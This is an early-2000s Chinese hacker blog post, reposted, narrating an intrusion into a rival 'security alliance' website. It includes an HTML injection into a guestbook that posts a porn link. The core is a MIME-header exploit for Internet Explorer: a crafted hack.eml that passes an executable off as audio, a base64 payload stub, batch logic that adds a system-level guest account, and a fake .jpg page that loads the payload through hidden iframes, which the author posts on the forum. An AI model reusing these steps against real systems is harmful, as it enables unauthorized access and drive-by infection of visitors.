MIME漏洞的利用(转载)

/ns/cn/jc/data/20011103221439.htm

作者:刀疤
 打开了一个网站,自称是一个“XX安全联盟”, 里面的东西却像垃圾一样,嚣张无聊:斑主是XX中国红客;本站安全天下第一;本站色情让您有眼福;本站美女如云。一个无趣的站,如果红客是这些家伙,那么中国们红客已经死了! 身为黑鸟刀疤不是什么猛男信女,所以今天决定黑了你!!
  先ping www.xx.com -t 返回值TTL=125,有丢包率;
看来是一台2000Server,且可能有防火东东. win2000我熟,黑定你了!!
  随便下了一个扫描器,看看有没有什么好东西,一扫果然是一台WIN2000,IIS5.0,PORT 21,25,80开放,没有什么cgi,asp的漏洞,也没有UNICODE,3389,溢出,IDQ。。。555555!!!
突然,看到它有个留言板,先去黑它吧,简单点。了解到是一个CGI的留言板,先看看是不是支持HTML,我来<H1>TEST </H1>,结果失望,返回出来了原句“<H1> TEST </H1>”~~~,可怜,不灰心,杀手锏到!!!
</font><h1>test</h1><font>!!成功了,终于出来了test大字, 嘿,再狠一点,发死循环吗?不,太狠了,发一个sex图片,这才和此安全站配嘛~~ good lunck for you!!
</font><a href="http://www.qmei.net/sex11.jpg">sex </a></p><font>,嘿嘿。。
解释一下,刚才的格式是</font>Html<font>,CGI留言程序调用
时用<FONT>.....</font>;留言内容作为变量返回服务器执行,所以在Html前后加上</font><font>, :) 搞定了走了!!
  还有一个论坛,看看,呵呵,人气极少,门可抓鸟,鸟不拉屎的地方,只有几条帖子,还有网管的一条显目的帖子,笑死人,名曰:
“上天啊,为什么没有人啊,没有天理啊~”晕死人,,
  “啊!论坛好象有IP查看程序,我的IP不是。。。。” 呵呵,放心,我在肉鸡上玩呢,是朋友给我的一个3389,我找不到好用的,衷心谢谢这个朋友,一鞠躬,二鞠躬。。。 再看一下斑主的IP,IP和服务器IP一样,看来网管GG用服务器上网,呆呆,奢侈的家伙。杀!  不过没有什么BUG.一个标准的论坛,很仔细的分析了一下,有上传图片功能,(Bmp,jpg,gif.....)其实是一个图片的超链接,BUG!! 有了感觉了,
来一个假BMP吧,嗯,什么都假,人民币都假呢!只是用错误的MIME头漏洞,不是老听到某某病毒可自动执行,好象就是用它。该漏洞是由一个国外安全小组发现的,该小组发现在MIME在处理不正常的MIME类型时存在个问题,攻击者可以创建一个Html格式的E-mail,该E-mail的附件为可执行文件,通过修改MIME头,使IE不正确处理这个MIME所指定的可执行文件附件。在此,我们来了解一下,IE是如何处理附件的:一般情况下如果附件是文本文件,IE会读它,如果是VIDEO CLIP,IE会查看它;如果附件是图形文件,IE就会显示它;如果附件是一个EXE文件呢?IE会提示用户是否执行!但当你更改MIME类型后,IE就不再提示用户是否执行而直接运行该附件,也可以绑一个cmd.exe! 
  编辑一个hack.eml:
  其内容如下:
(略去了大部分无用格式)
-1
Content-Type: audio/x-wav; <--------
name="zrj.exe"        <--- zrj.exe
Content-Transfer-Encoding: base64
Content-ID:

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4
gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUAC
AAAAAQAAAAkAAAIL0AAACgAAAAwAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQA
AAAEAAAAAA.....

--1

其中的zrj.exe是我用VB简单编写的,一般的调用外部命令
只讲讲思路吧, 先看看是不是本服务器IP,因为网管常来这里
(现在发现其实也可以用DOS的批命令完成),如下:
 ipconfig>c:\ip.txt
type ip.txt| find "202.107.xx.xx"
goto hack (此程序未调试过)
再net user一个guest的system,OK!
  最后做一个bmp的html:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>New Page 1</title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>
<body>
<p><img src="123.JPG" width="322" height="486"></p>
<iframe src="hack.eml" width="0" height="0"
 ̄ ̄ ̄ ̄
frameborder="no"
border="0"
marginwidth="0" marginheight="0" scrolling="no">
</iframe>
<iframe src="zrj.htm" width="0" height="0" frameborder="no" border="0"
marginwidth="0" marginheight="0" scrolling="no">
</iframe>
</body>
</html>
在 NOTEPAD 上写一份 HTML 文件,保存为 .jpg。上传至空间服务器,用 IE 访问 URL。发现,IE 把 .jpg 误读成 .html.
最后在论坛上打入此图片的链接地址(放在我的肉机上,啊,肉机也要Clear一下,嘿嘿安全第一)
......
......
......
几小时后,服务器上多了一个guest用户,为system权限;
                  
以后的活就拿手多了~~呵呵~ OVER~~

2001.10.28 刀疤